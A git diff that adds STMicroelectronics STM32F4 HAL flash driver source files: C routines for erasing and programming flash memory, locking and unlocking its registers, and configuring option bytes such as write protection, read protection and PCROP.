+ + /*Increment sector number*/ + pFlash.Sector++; + addresstmp = pFlash.Sector; + FLASH_Erase_Sector(addresstmp, pFlash.VoltageForErase); + } + else + { + /*No more sectors to Erase, user callback can be called.*/ + /*Reset Sector and stop Erase sectors procedure*/ + pFlash.Sector = addresstmp = 0xFFFFFFFFU; + pFlash.ProcedureOnGoing = FLASH_PROC_NONE; + + /* Flush the caches to be sure of the data consistency */ + FLASH_FlushCaches() ; + + /* FLASH EOP interrupt user callback */ + HAL_FLASH_EndOfOperationCallback(addresstmp); + } + } + else + { + if(pFlash.ProcedureOnGoing == FLASH_PROC_MASSERASE) + { + /* MassErase ended. Return the selected bank */ + /* Flush the caches to be sure of the data consistency */ + FLASH_FlushCaches() ; + + /* FLASH EOP interrupt user callback */ + HAL_FLASH_EndOfOperationCallback(pFlash.Bank); + } + else + { + /*Program ended. Return the selected address*/ + /* FLASH EOP interrupt user callback */ + HAL_FLASH_EndOfOperationCallback(pFlash.Address); + } + pFlash.ProcedureOnGoing = FLASH_PROC_NONE; + } + } + + if(pFlash.ProcedureOnGoing == FLASH_PROC_NONE) + { + /* Operation is completed, disable the PG, SER, SNB and MER Bits */ + CLEAR_BIT(FLASH->CR, (FLASH_CR_PG | FLASH_CR_SER | FLASH_CR_SNB | FLASH_MER_BIT)); + + /* Disable End of FLASH Operation interrupt */ + __HAL_FLASH_DISABLE_IT(FLASH_IT_EOP); + + /* Disable Error source interrupt */ + __HAL_FLASH_DISABLE_IT(FLASH_IT_ERR); + + /* Process Unlocked */ + __HAL_UNLOCK(&pFlash); + } +} + +/** + * @brief FLASH end of operation interrupt callback + * @param ReturnValue The value saved in this parameter depends on the ongoing procedure + * Mass Erase: Bank number which has been requested to erase + * Sectors Erase: Sector which has been erased + * (if 0xFFFFFFFFU, it means that all the selected sectors have been erased) + * Program: Address which was selected for data program + * @retval None + */ +__weak void HAL_FLASH_EndOfOperationCallback(uint32_t ReturnValue) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(ReturnValue); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_FLASH_EndOfOperationCallback could be implemented in the user file + */ +} + +/** + * @brief FLASH operation error interrupt callback + * @param ReturnValue The value saved in this parameter depends on the ongoing procedure + * Mass Erase: Bank number which has been requested to erase + * Sectors Erase: Sector number which returned an error + * Program: Address which was selected for data program + * @retval None + */ +__weak void HAL_FLASH_OperationErrorCallback(uint32_t ReturnValue) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(ReturnValue); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_FLASH_OperationErrorCallback could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup FLASH_Exported_Functions_Group2 Peripheral Control functions + * @brief management functions + * +@verbatim + =============================================================================== + ##### Peripheral Control functions ##### + =============================================================================== + [..] + This subsection provides a set of functions allowing to control the FLASH + memory operations. + +@endverbatim + * @{ + */ + +/** + * @brief Unlock the FLASH control register access + * @retval HAL Status + */ +HAL_StatusTypeDef HAL_FLASH_Unlock(void) +{ + HAL_StatusTypeDef status = HAL_OK; + + if(READ_BIT(FLASH->CR, FLASH_CR_LOCK) != RESET) + { + /* Authorize the FLASH Registers access */ + WRITE_REG(FLASH->KEYR, FLASH_KEY1); + WRITE_REG(FLASH->KEYR, FLASH_KEY2); + + /* Verify Flash is unlocked */ + if(READ_BIT(FLASH->CR, FLASH_CR_LOCK) != RESET) + { + status = HAL_ERROR; + } + } + + return status; +} + +/** + * @brief Locks the FLASH control register access + * @retval HAL Status + */ +HAL_StatusTypeDef HAL_FLASH_Lock(void) +{ + /* Set the LOCK Bit to lock the FLASH Registers access */ + FLASH->CR |= FLASH_CR_LOCK; + + return HAL_OK; +} + +/** + * @brief Unlock the FLASH Option Control Registers access. + * @retval HAL Status + */ +HAL_StatusTypeDef HAL_FLASH_OB_Unlock(void) +{ + if((FLASH->OPTCR & FLASH_OPTCR_OPTLOCK) != RESET) + { + /* Authorizes the Option Byte register programming */ + FLASH->OPTKEYR = FLASH_OPT_KEY1; + FLASH->OPTKEYR = FLASH_OPT_KEY2; + } + else + { + return HAL_ERROR; + } + + return HAL_OK; +} + +/** + * @brief Lock the FLASH Option Control Registers access. + * @retval HAL Status + */ +HAL_StatusTypeDef HAL_FLASH_OB_Lock(void) +{ + /* Set the OPTLOCK Bit to lock the FLASH Option Byte Registers access */ + FLASH->OPTCR |= FLASH_OPTCR_OPTLOCK; + + return HAL_OK; +} + +/** + * @brief Launch the option byte loading. + * @retval HAL Status + */ +HAL_StatusTypeDef HAL_FLASH_OB_Launch(void) +{ + /* Set the OPTSTRT bit in OPTCR register */ + *(__IO uint8_t *)OPTCR_BYTE0_ADDRESS |= FLASH_OPTCR_OPTSTRT; + + /* Wait for last operation to be completed */ + return(FLASH_WaitForLastOperation((uint32_t)FLASH_TIMEOUT_VALUE)); +} + +/** + * @} + */ + +/** @defgroup FLASH_Exported_Functions_Group3 Peripheral State and Errors functions + * @brief Peripheral Errors functions + * +@verbatim + =============================================================================== + ##### Peripheral Errors functions ##### + =============================================================================== + [..] + This subsection permits to get in run-time Errors of the FLASH peripheral. + +@endverbatim + * @{ + */ + +/** + * @brief Get the specific FLASH error flag. + * @retval FLASH_ErrorCode: The returned value can be a combination of: + * @arg HAL_FLASH_ERROR_RD: FLASH Read Protection error flag (PCROP) + * @arg HAL_FLASH_ERROR_PGS: FLASH Programming Sequence error flag + * @arg HAL_FLASH_ERROR_PGP: FLASH Programming Parallelism error flag + * @arg HAL_FLASH_ERROR_PGA: FLASH Programming Alignment error flag + * @arg HAL_FLASH_ERROR_WRP: FLASH Write protected error flag + * @arg HAL_FLASH_ERROR_OPERATION: FLASH operation Error flag + */ +uint32_t HAL_FLASH_GetError(void) +{ + return pFlash.ErrorCode; +} + +/** + * @} + */ + +/** + * @brief Wait for a FLASH operation to complete. + * @param Timeout maximum flash operationtimeout + * @retval HAL Status + */ +HAL_StatusTypeDef FLASH_WaitForLastOperation(uint32_t Timeout) +{ + uint32_t tickstart = 0U; + + /* Clear Error Code */ + pFlash.ErrorCode = HAL_FLASH_ERROR_NONE; + + /* Wait for the FLASH operation to complete by polling on BUSY flag to be reset. + Even if the FLASH operation fails, the BUSY flag will be reset and an error + flag will be set */ + /* Get tick */ + tickstart = HAL_GetTick(); + + while(__HAL_FLASH_GET_FLAG(FLASH_FLAG_BSY) != RESET) + { + if(Timeout != HAL_MAX_DELAY) + { + if((Timeout == 0U)||((HAL_GetTick() - tickstart ) > Timeout)) + { + return HAL_TIMEOUT; + } + } + } + + /* Check FLASH End of Operation flag */ + if (__HAL_FLASH_GET_FLAG(FLASH_FLAG_EOP) != RESET) + { + /* Clear FLASH End of Operation pending bit */ + __HAL_FLASH_CLEAR_FLAG(FLASH_FLAG_EOP); + } +#if defined(FLASH_SR_RDERR) + if(__HAL_FLASH_GET_FLAG((FLASH_FLAG_OPERR | FLASH_FLAG_WRPERR | FLASH_FLAG_PGAERR | \ + FLASH_FLAG_PGPERR | FLASH_FLAG_PGSERR | FLASH_FLAG_RDERR)) != RESET) +#else + if(__HAL_FLASH_GET_FLAG((FLASH_FLAG_OPERR | FLASH_FLAG_WRPERR | FLASH_FLAG_PGAERR | \ + FLASH_FLAG_PGPERR | FLASH_FLAG_PGSERR)) != RESET) +#endif /* FLASH_SR_RDERR */ + { + /*Save the error code*/ + FLASH_SetErrorCode(); + return HAL_ERROR; + } + + /* If there is no error flag set */ + return HAL_OK; + +} + +/** + * @brief Program a double word (64-bit) at a specified address. + * @note This function must be used when the device voltage range is from + * 2.7V to 3.6V and Vpp in the range 7V to 9V. + * + * @note If an erase and a program operations are requested simultaneously, + * the erase operation is performed before the program one. + * + * @param Address specifies the address to be programmed. + * @param Data specifies the data to be programmed. + * @retval None + */ +static void FLASH_Program_DoubleWord(uint32_t Address, uint64_t Data) +{ + /* Check the parameters */ + assert_param(IS_FLASH_ADDRESS(Address)); + + /* If the previous operation is completed, proceed to program the new data */ + CLEAR_BIT(FLASH->CR, FLASH_CR_PSIZE); + FLASH->CR |= FLASH_PSIZE_DOUBLE_WORD; + FLASH->CR |= FLASH_CR_PG; + + /* Program first word */ + *(__IO uint32_t*)Address = (uint32_t)Data; + + /* Barrier to ensure programming is performed in 2 steps, in right order + (independently of compiler optimization behavior) */ + __ISB(); + + /* Program second word */ + *(__IO uint32_t*)(Address+4) = (uint32_t)(Data >> 32); +} + + +/** + * @brief Program word (32-bit) at a specified address. + * @note This function must be used when the device voltage range is from + * 2.7V to 3.6V. + * + * @note If an erase and a program operations are requested simultaneously, + * the erase operation is performed before the program one. + * + * @param Address specifies the address to be programmed. + * @param Data specifies the data to be programmed. + * @retval None + */ +static void FLASH_Program_Word(uint32_t Address, uint32_t Data) +{ + /* Check the parameters */ + assert_param(IS_FLASH_ADDRESS(Address)); + + /* If the previous operation is completed, proceed to program the new data */ + CLEAR_BIT(FLASH->CR, FLASH_CR_PSIZE); + FLASH->CR |= FLASH_PSIZE_WORD; + FLASH->CR |= FLASH_CR_PG; + + *(__IO uint32_t*)Address = Data; +} + +/** + * @brief Program a half-word (16-bit) at a specified address. + * @note This function must be used when the device voltage range is from + * 2.1V to 3.6V. + * + * @note If an erase and a program operations are requested simultaneously, + * the erase operation is performed before the program one. + * + * @param Address specifies the address to be programmed. + * @param Data specifies the data to be programmed. + * @retval None + */ +static void FLASH_Program_HalfWord(uint32_t Address, uint16_t Data) +{ + /* Check the parameters */ + assert_param(IS_FLASH_ADDRESS(Address)); + + /* If the previous operation is completed, proceed to program the new data */ + CLEAR_BIT(FLASH->CR, FLASH_CR_PSIZE); + FLASH->CR |= FLASH_PSIZE_HALF_WORD; + FLASH->CR |= FLASH_CR_PG; + + *(__IO uint16_t*)Address = Data; +} + +/** + * @brief Program byte (8-bit) at a specified address. + * @note This function must be used when the device voltage range is from + * 1.8V to 3.6V. + * + * @note If an erase and a program operations are requested simultaneously, + * the erase operation is performed before the program one. + * + * @param Address specifies the address to be programmed. + * @param Data specifies the data to be programmed. + * @retval None + */ +static void FLASH_Program_Byte(uint32_t Address, uint8_t Data) +{ + /* Check the parameters */ + assert_param(IS_FLASH_ADDRESS(Address)); + + /* If the previous operation is completed, proceed to program the new data */ + CLEAR_BIT(FLASH->CR, FLASH_CR_PSIZE); + FLASH->CR |= FLASH_PSIZE_BYTE; + FLASH->CR |= FLASH_CR_PG; + + *(__IO uint8_t*)Address = Data; +} + +/** + * @brief Set the specific FLASH error flag. + * @retval None + */ +static void FLASH_SetErrorCode(void) +{ + if(__HAL_FLASH_GET_FLAG(FLASH_FLAG_WRPERR) != RESET) + { + pFlash.ErrorCode |= HAL_FLASH_ERROR_WRP; + + /* Clear FLASH write protection error pending bit */ + __HAL_FLASH_CLEAR_FLAG(FLASH_FLAG_WRPERR); + } + + if(__HAL_FLASH_GET_FLAG(FLASH_FLAG_PGAERR) != RESET) + { + pFlash.ErrorCode |= HAL_FLASH_ERROR_PGA; + + /* Clear FLASH Programming alignment error pending bit */ + __HAL_FLASH_CLEAR_FLAG(FLASH_FLAG_PGAERR); + } + + if(__HAL_FLASH_GET_FLAG(FLASH_FLAG_PGPERR) != RESET) + { + pFlash.ErrorCode |= HAL_FLASH_ERROR_PGP; + + /* Clear FLASH Programming parallelism error pending bit */ + __HAL_FLASH_CLEAR_FLAG(FLASH_FLAG_PGPERR); + } + + if(__HAL_FLASH_GET_FLAG(FLASH_FLAG_PGSERR) != RESET) + { + pFlash.ErrorCode |= HAL_FLASH_ERROR_PGS; + + /* Clear FLASH Programming sequence error pending bit */ + __HAL_FLASH_CLEAR_FLAG(FLASH_FLAG_PGSERR); + } +#if defined(FLASH_SR_RDERR) + if(__HAL_FLASH_GET_FLAG(FLASH_FLAG_RDERR) != RESET) + { + pFlash.ErrorCode |= HAL_FLASH_ERROR_RD; + + /* Clear FLASH Proprietary readout protection error pending bit */ + __HAL_FLASH_CLEAR_FLAG(FLASH_FLAG_RDERR); + } +#endif /* FLASH_SR_RDERR */ + if(__HAL_FLASH_GET_FLAG(FLASH_FLAG_OPERR) != RESET) + { + pFlash.ErrorCode |= HAL_FLASH_ERROR_OPERATION; + + /* Clear FLASH Operation error pending bit */ + __HAL_FLASH_CLEAR_FLAG(FLASH_FLAG_OPERR); + } +} + +/** + * @} + */ + +#endif /* HAL_FLASH_MODULE_ENABLED */ + +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_flash_ex.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_flash_ex.c new file mode 100644 index 000000000..628e78958 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_flash_ex.c @@ -0,0 +1,1353 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_flash_ex.c + * @author MCD Application Team + * @brief Extended FLASH HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the FLASH extension peripheral: + * + Extended programming operations functions + * + @verbatim + ============================================================================== + ##### Flash Extension features ##### + ============================================================================== + + [..] Comparing to other previous devices, the FLASH interface for STM32F427xx/437xx and + STM32F429xx/439xx devices contains the following additional features + + (+) Capacity up to 2 Mbyte with dual bank architecture supporting read-while-write + capability (RWW) + (+) Dual bank memory organization + (+) PCROP protection for all banks + + ##### How to use this driver ##### + ============================================================================== + [..] This driver provides functions to configure and program the FLASH memory + of all STM32F427xx/437xx, STM32F429xx/439xx, STM32F469xx/479xx and STM32F446xx + devices. It includes + (#) FLASH Memory Erase functions: + (++) Lock and Unlock the FLASH interface using HAL_FLASH_Unlock() and + HAL_FLASH_Lock() functions + (++) Erase function: Erase sector, erase all sectors + (++) There are two modes of erase : + (+++) Polling Mode using HAL_FLASHEx_Erase() + (+++) Interrupt Mode using HAL_FLASHEx_Erase_IT() + + (#) Option Bytes Programming functions: Use HAL_FLASHEx_OBProgram() to : + (++) Set/Reset the write protection + (++) Set the Read protection Level + (++) Set the BOR level + (++) Program the user Option Bytes + (#) Advanced Option Bytes Programming functions: Use HAL_FLASHEx_AdvOBProgram() to : + (++) Extended space (bank 2) erase function + (++) Full FLASH space (2 Mo) erase (bank 1 and bank 2) + (++) Dual Boot activation + (++) Write protection configuration for bank 2 + (++) PCROP protection configuration and control for both banks + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup FLASHEx FLASHEx + * @brief FLASH HAL Extension module driver + * @{ + */ + +#ifdef HAL_FLASH_MODULE_ENABLED + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/** @addtogroup FLASHEx_Private_Constants + * @{ + */ +#define FLASH_TIMEOUT_VALUE 50000U /* 50 s */ +/** + * @} + */ + +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/** @addtogroup FLASHEx_Private_Variables + * @{ + */ +extern FLASH_ProcessTypeDef pFlash; +/** + * @} + */ + +/* Private function prototypes -----------------------------------------------*/ +/** @addtogroup FLASHEx_Private_Functions + * @{ + */ +/* Option bytes control */ +static void FLASH_MassErase(uint8_t VoltageRange, uint32_t Banks); +static HAL_StatusTypeDef FLASH_OB_EnableWRP(uint32_t WRPSector, uint32_t Banks); +static HAL_StatusTypeDef FLASH_OB_DisableWRP(uint32_t WRPSector, uint32_t Banks); +static HAL_StatusTypeDef FLASH_OB_RDP_LevelConfig(uint8_t Level); +static HAL_StatusTypeDef FLASH_OB_UserConfig(uint8_t Iwdg, uint8_t Stop, uint8_t Stdby); +static HAL_StatusTypeDef FLASH_OB_BOR_LevelConfig(uint8_t Level); +static uint8_t FLASH_OB_GetUser(void); +static uint16_t FLASH_OB_GetWRP(void); +static uint8_t FLASH_OB_GetRDP(void); +static uint8_t FLASH_OB_GetBOR(void); + +#if defined(STM32F401xC) || defined(STM32F401xE) || defined(STM32F410Tx) || defined(STM32F410Cx) || defined(STM32F410Rx) || defined(STM32F411xE) ||\ + defined(STM32F446xx) || defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F412Cx) || defined(STM32F413xx) ||\ + defined(STM32F423xx) +static HAL_StatusTypeDef FLASH_OB_EnablePCROP(uint32_t Sector); +static HAL_StatusTypeDef FLASH_OB_DisablePCROP(uint32_t Sector); +#endif /* STM32F401xC || STM32F401xE || STM32F410xx || STM32F411xE || STM32F446xx || STM32F412Zx || STM32F412Vx || STM32F412Rx || STM32F412Cx + STM32F413xx || STM32F423xx */ + +#if defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx)|| defined(STM32F439xx) || defined(STM32F469xx) || defined(STM32F479xx) +static HAL_StatusTypeDef FLASH_OB_EnablePCROP(uint32_t SectorBank1, uint32_t SectorBank2, uint32_t Banks); +static HAL_StatusTypeDef FLASH_OB_DisablePCROP(uint32_t SectorBank1, uint32_t SectorBank2, uint32_t Banks); +static HAL_StatusTypeDef FLASH_OB_BootConfig(uint8_t BootConfig); +#endif /* STM32F427xx || STM32F437xx || STM32F429xx || STM32F439xx || STM32F469xx || STM32F479xx */ + +extern HAL_StatusTypeDef FLASH_WaitForLastOperation(uint32_t Timeout); +/** + * @} + */ + +/* Exported functions --------------------------------------------------------*/ +/** @defgroup FLASHEx_Exported_Functions FLASHEx Exported Functions + * @{ + */ + +/** @defgroup FLASHEx_Exported_Functions_Group1 Extended IO operation functions + * @brief Extended IO operation functions + * +@verbatim + =============================================================================== + ##### Extended programming operation functions ##### + =============================================================================== + [..] + This subsection provides a set of functions allowing to manage the Extension FLASH + programming operations. + +@endverbatim + * @{ + */ +/** + * @brief Perform a mass erase or erase the specified FLASH memory sectors + * @param[in] pEraseInit pointer to an FLASH_EraseInitTypeDef structure that + * contains the configuration information for the erasing. + * + * @param[out] SectorError pointer to variable that + * contains the configuration information on faulty sector in case of error + * (0xFFFFFFFFU means that all the sectors have been correctly erased) + * + * @retval HAL Status + */ +HAL_StatusTypeDef HAL_FLASHEx_Erase(FLASH_EraseInitTypeDef *pEraseInit, uint32_t *SectorError) +{ + HAL_StatusTypeDef status = HAL_ERROR; + uint32_t index = 0U; + + /* Process Locked */ + __HAL_LOCK(&pFlash); + + /* Check the parameters */ + assert_param(IS_FLASH_TYPEERASE(pEraseInit->TypeErase)); + + /* Wait for last operation to be completed */ + status = FLASH_WaitForLastOperation((uint32_t)FLASH_TIMEOUT_VALUE); + + if (status == HAL_OK) + { + /*Initialization of SectorError variable*/ + *SectorError = 0xFFFFFFFFU; + + if (pEraseInit->TypeErase == FLASH_TYPEERASE_MASSERASE) + { + /*Mass erase to be done*/ + FLASH_MassErase((uint8_t) pEraseInit->VoltageRange, pEraseInit->Banks); + + /* Wait for last operation to be completed */ + status = FLASH_WaitForLastOperation((uint32_t)FLASH_TIMEOUT_VALUE); + + /* if the erase operation is completed, disable the MER Bit */ + FLASH->CR &= (~FLASH_MER_BIT); + } + else + { + /* Check the parameters */ + assert_param(IS_FLASH_NBSECTORS(pEraseInit->NbSectors + pEraseInit->Sector)); + + /* Erase by sector by sector to be done*/ + for (index = pEraseInit->Sector; index < (pEraseInit->NbSectors + pEraseInit->Sector); index++) + { + FLASH_Erase_Sector(index, (uint8_t) pEraseInit->VoltageRange); + + /* Wait for last operation to be completed */ + status = FLASH_WaitForLastOperation((uint32_t)FLASH_TIMEOUT_VALUE); + + /* If the erase operation is completed, disable the SER and SNB Bits */ + CLEAR_BIT(FLASH->CR, (FLASH_CR_SER | FLASH_CR_SNB)); + + if (status != HAL_OK) + { + /* In case of error, stop erase procedure and return the faulty sector*/ + *SectorError = index; + break; + } + } + } + /* Flush the caches to be sure of the data consistency */ + FLASH_FlushCaches(); + } + + /* Process Unlocked */ + __HAL_UNLOCK(&pFlash); + + return status; +} + +/** + * @brief Perform a mass erase or erase the specified FLASH memory sectors with interrupt enabled + * @param pEraseInit pointer to an FLASH_EraseInitTypeDef structure that + * contains the configuration information for the erasing. + * + * @retval HAL Status + */ +HAL_StatusTypeDef HAL_FLASHEx_Erase_IT(FLASH_EraseInitTypeDef *pEraseInit) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process Locked */ + __HAL_LOCK(&pFlash); + + /* Check the parameters */ + assert_param(IS_FLASH_TYPEERASE(pEraseInit->TypeErase)); + + /* Enable End of FLASH Operation interrupt */ + __HAL_FLASH_ENABLE_IT(FLASH_IT_EOP); + + /* Enable Error source interrupt */ + __HAL_FLASH_ENABLE_IT(FLASH_IT_ERR); + + /* Clear pending flags (if any) */ + __HAL_FLASH_CLEAR_FLAG(FLASH_FLAG_EOP | FLASH_FLAG_OPERR | FLASH_FLAG_WRPERR | \ + FLASH_FLAG_PGAERR | FLASH_FLAG_PGPERR | FLASH_FLAG_PGSERR); + + if (pEraseInit->TypeErase == FLASH_TYPEERASE_MASSERASE) + { + /*Mass erase to be done*/ + pFlash.ProcedureOnGoing = FLASH_PROC_MASSERASE; + pFlash.Bank = pEraseInit->Banks; + FLASH_MassErase((uint8_t) pEraseInit->VoltageRange, pEraseInit->Banks); + } + else + { + /* Erase by sector to be done*/ + + /* Check the parameters */ + assert_param(IS_FLASH_NBSECTORS(pEraseInit->NbSectors + pEraseInit->Sector)); + + pFlash.ProcedureOnGoing = FLASH_PROC_SECTERASE; + pFlash.NbSectorsToErase = pEraseInit->NbSectors; + pFlash.Sector = pEraseInit->Sector; + pFlash.VoltageForErase = (uint8_t)pEraseInit->VoltageRange; + + /*Erase 1st sector and wait for IT*/ + FLASH_Erase_Sector(pEraseInit->Sector, pEraseInit->VoltageRange); + } + + return status; +} + +/** + * @brief Program option bytes + * @param pOBInit pointer to an FLASH_OBInitStruct structure that + * contains the configuration information for the programming. + * + * @retval HAL Status + */ +HAL_StatusTypeDef HAL_FLASHEx_OBProgram(FLASH_OBProgramInitTypeDef *pOBInit) +{ + HAL_StatusTypeDef status = HAL_ERROR; + + /* Process Locked */ + __HAL_LOCK(&pFlash); + + /* Check the parameters */ + assert_param(IS_OPTIONBYTE(pOBInit->OptionType)); + + /*Write protection configuration*/ + if ((pOBInit->OptionType & OPTIONBYTE_WRP) == OPTIONBYTE_WRP) + { + assert_param(IS_WRPSTATE(pOBInit->WRPState)); + if (pOBInit->WRPState == OB_WRPSTATE_ENABLE) + { + /*Enable of Write protection on the selected Sector*/ + status = FLASH_OB_EnableWRP(pOBInit->WRPSector, pOBInit->Banks); + } + else + { + /*Disable of Write protection on the selected Sector*/ + status = FLASH_OB_DisableWRP(pOBInit->WRPSector, pOBInit->Banks); + } + } + + /*Read protection configuration*/ + if ((pOBInit->OptionType & OPTIONBYTE_RDP) == OPTIONBYTE_RDP) + { + status = FLASH_OB_RDP_LevelConfig(pOBInit->RDPLevel); + } + + /*USER configuration*/ + if ((pOBInit->OptionType & OPTIONBYTE_USER) == OPTIONBYTE_USER) + { + status = FLASH_OB_UserConfig(pOBInit->USERConfig & OB_IWDG_SW, + pOBInit->USERConfig & OB_STOP_NO_RST, + pOBInit->USERConfig & OB_STDBY_NO_RST); + } + + /*BOR Level configuration*/ + if ((pOBInit->OptionType & OPTIONBYTE_BOR) == OPTIONBYTE_BOR) + { + status = FLASH_OB_BOR_LevelConfig(pOBInit->BORLevel); + } + + /* Process Unlocked */ + __HAL_UNLOCK(&pFlash); + + return status; +} + +/** + * @brief Get the Option byte configuration + * @param pOBInit pointer to an FLASH_OBInitStruct structure that + * contains the configuration information for the programming. + * + * @retval None + */ +void HAL_FLASHEx_OBGetConfig(FLASH_OBProgramInitTypeDef *pOBInit) +{ + pOBInit->OptionType = OPTIONBYTE_WRP | OPTIONBYTE_RDP | OPTIONBYTE_USER | OPTIONBYTE_BOR; + + /*Get WRP*/ + pOBInit->WRPSector = (uint32_t)FLASH_OB_GetWRP(); + + /*Get RDP Level*/ + pOBInit->RDPLevel = (uint32_t)FLASH_OB_GetRDP(); + + /*Get USER*/ + pOBInit->USERConfig = (uint8_t)FLASH_OB_GetUser(); + + /*Get BOR Level*/ + pOBInit->BORLevel = (uint32_t)FLASH_OB_GetBOR(); +} + +#if defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx) || defined(STM32F439xx) ||\ + defined(STM32F401xC) || defined(STM32F401xE) || defined(STM32F410Tx) || defined(STM32F410Cx) ||\ + defined(STM32F410Rx) || defined(STM32F411xE) || defined(STM32F446xx) || defined(STM32F469xx) ||\ + defined(STM32F479xx) || defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) ||\ + defined(STM32F412Cx) || defined(STM32F413xx) || defined(STM32F423xx) +/** + * @brief Program option bytes + * @param pAdvOBInit pointer to an FLASH_AdvOBProgramInitTypeDef structure that + * contains the configuration information for the programming. + * + * @retval HAL Status + */ +HAL_StatusTypeDef HAL_FLASHEx_AdvOBProgram(FLASH_AdvOBProgramInitTypeDef *pAdvOBInit) +{ + HAL_StatusTypeDef status = HAL_ERROR; + + /* Check the parameters */ + assert_param(IS_OBEX(pAdvOBInit->OptionType)); + + /*Program PCROP option byte*/ + if (((pAdvOBInit->OptionType) & OPTIONBYTE_PCROP) == OPTIONBYTE_PCROP) + { + /* Check the parameters */ + assert_param(IS_PCROPSTATE(pAdvOBInit->PCROPState)); + if ((pAdvOBInit->PCROPState) == OB_PCROP_STATE_ENABLE) + { + /*Enable of Write protection on the selected Sector*/ +#if defined(STM32F401xC) || defined(STM32F401xE) || defined(STM32F410Tx) || defined(STM32F410Cx) || defined(STM32F410Rx) ||\ + defined(STM32F411xE) || defined(STM32F446xx) || defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) ||\ + defined(STM32F412Cx) || defined(STM32F413xx) || defined(STM32F423xx) + status = FLASH_OB_EnablePCROP(pAdvOBInit->Sectors); +#else /* STM32F427xx || STM32F437xx || STM32F429xx|| STM32F439xx || STM32F469xx || STM32F479xx */ + status = FLASH_OB_EnablePCROP(pAdvOBInit->SectorsBank1, pAdvOBInit->SectorsBank2, pAdvOBInit->Banks); +#endif /* STM32F401xC || STM32F401xE || STM32F410xx || STM32F411xE || STM32F446xx || STM32F412Zx || STM32F412Vx || STM32F412Rx || STM32F412Cx || + STM32F413xx || STM32F423xx */ + } + else + { + /*Disable of Write protection on the selected Sector*/ +#if defined(STM32F401xC) || defined(STM32F401xE) || defined(STM32F410Tx) || defined(STM32F410Cx) || defined(STM32F410Rx) ||\ + defined(STM32F411xE) || defined(STM32F446xx) || defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) ||\ + defined(STM32F412Cx) || defined(STM32F413xx) || defined(STM32F423xx) + status = FLASH_OB_DisablePCROP(pAdvOBInit->Sectors); +#else /* STM32F427xx || STM32F437xx || STM32F429xx|| STM32F439xx || STM32F469xx || STM32F479xx */ + status = FLASH_OB_DisablePCROP(pAdvOBInit->SectorsBank1, pAdvOBInit->SectorsBank2, pAdvOBInit->Banks); +#endif /* STM32F401xC || STM32F401xE || STM32F410xx || STM32F411xE || STM32F446xx || STM32F412Zx || STM32F412Vx || STM32F412Rx || STM32F412Cx || + STM32F413xx || STM32F423xx */ + } + } + +#if defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx) || defined(STM32F439xx) || defined(STM32F469xx) || defined(STM32F479xx) + /*Program BOOT config option byte*/ + if (((pAdvOBInit->OptionType) & OPTIONBYTE_BOOTCONFIG) == OPTIONBYTE_BOOTCONFIG) + { + status = FLASH_OB_BootConfig(pAdvOBInit->BootConfig); + } +#endif /* STM32F427xx || STM32F437xx || STM32F429xx || STM32F439xx || STM32F469xx || STM32F479xx */ + + return status; +} + +/** + * @brief Get the OBEX byte configuration + * @param pAdvOBInit pointer to an FLASH_AdvOBProgramInitTypeDef structure that + * contains the configuration information for the programming. + * + * @retval None + */ +void HAL_FLASHEx_AdvOBGetConfig(FLASH_AdvOBProgramInitTypeDef *pAdvOBInit) +{ +#if defined(STM32F401xC) || defined(STM32F401xE) || defined(STM32F410Tx) || defined(STM32F410Cx) || defined(STM32F410Rx) ||\ + defined(STM32F411xE) || defined(STM32F446xx) || defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) ||\ + defined(STM32F412Cx) || defined(STM32F413xx) || defined(STM32F423xx) + /*Get Sector*/ + pAdvOBInit->Sectors = (*(__IO uint16_t *)(OPTCR_BYTE2_ADDRESS)); +#else /* STM32F427xx || STM32F437xx || STM32F429xx|| STM32F439xx || STM32F469xx || STM32F479xx */ + /*Get Sector for Bank1*/ + pAdvOBInit->SectorsBank1 = (*(__IO uint16_t *)(OPTCR_BYTE2_ADDRESS)); + + /*Get Sector for Bank2*/ + pAdvOBInit->SectorsBank2 = (*(__IO uint16_t *)(OPTCR1_BYTE2_ADDRESS)); + + /*Get Boot config OB*/ + pAdvOBInit->BootConfig = *(__IO uint8_t *)OPTCR_BYTE0_ADDRESS; +#endif /* STM32F401xC || STM32F401xE || STM32F410xx || STM32F411xE || STM32F446xx || STM32F412Zx || STM32F412Vx || STM32F412Rx || STM32F412Cx || + STM32F413xx || STM32F423xx */ +} + +/** + * @brief Select the Protection Mode + * + * @note After PCROP activated Option Byte modification NOT POSSIBLE! excepted + * Global Read Out Protection modification (from level1 to level0) + * @note Once SPRMOD bit is active unprotection of a protected sector is not possible + * @note Read a protected sector will set RDERR Flag and write a protected sector will set WRPERR Flag + * @note This 